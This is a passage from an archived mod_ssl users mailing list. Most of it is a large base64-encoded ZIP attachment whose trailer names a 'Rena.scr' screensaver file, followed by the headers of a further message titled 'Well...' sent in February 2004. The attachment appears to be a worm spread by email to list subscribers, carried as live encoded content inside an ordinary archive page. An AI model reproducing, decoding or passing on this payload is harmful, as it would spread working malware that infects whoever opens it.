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

----------bwxtemwftorsoiidaqhx--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 29 23:53:01 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2E40EA8976; Sun, 29 Feb 2004 23:53:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mega-pouch (bgp532200bgs.ebrnsw01.nj.comcast.net [68.38.105.80])
	by master.modssl.org (Postfix) with SMTP id 75AE8A893A
	for ; Sun, 29 Feb 2004 23:52:53 +0100 (CET)
Date: Sun, 29 Feb 2004 17:50:35 -0500
To: modssl-users@modssl.org
Subject: Well...
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------grphnmwdlyvqidvugrpm"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------grphnmwdlyvqidvugrpm
Content-Type: text/plain; charset="us-ascii"
